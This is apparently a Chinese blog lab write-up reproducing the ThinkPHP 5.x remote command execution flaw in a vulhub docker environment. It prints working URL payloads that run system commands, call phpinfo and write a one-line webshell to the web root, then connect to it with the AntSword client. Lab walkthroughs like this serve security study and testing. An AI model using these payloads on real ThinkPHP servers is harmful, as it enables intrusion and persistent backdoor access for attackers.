Thinkphp5x远程命令执行靶场攻略

2407-2 shw2024-09-24 17:30

环境配置

云服务器：47.113.231.0:8080
靶场：vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场：http://47.113.231.0:8080/

2.远程命令执⾏

POC：
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/04a49df66abb463c9c0543bf4c310e36.png) ### 3.远程代码执行 POC： ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/a6eeab97a027466d910a1e84e0b1d2a9.png) ### 4.写入一句话木马到根目录下的shw.php POC： ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> shw.php ### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/d247f62ffdf7449bafe4d66c51704031.png)

上一篇：Ubuntu 编译安装 ffmpeg

下一篇：17【Protues单片机仿真】基于51单片机的太阳能智能谷物翻晒机器人

热门推荐

01【图像处理与机器视觉】XJTU期末考点 02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑 03KGG转MP3工具|非KGM文件|解密音频 04海康Visionmaster-常见问题排查方法-启动阶段 05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高，一键全文降！文件格式不变，公式都保留的！07Coze扣子平台完整体验和实践（附国内和国际版对比）08DeepSeek各版本说明与优缺点分析 09VMware虚拟机安装Win7专业版保姆级教程（附镜像包）10坚果投影仪J10如何用苹果Siri开关机并和米家联动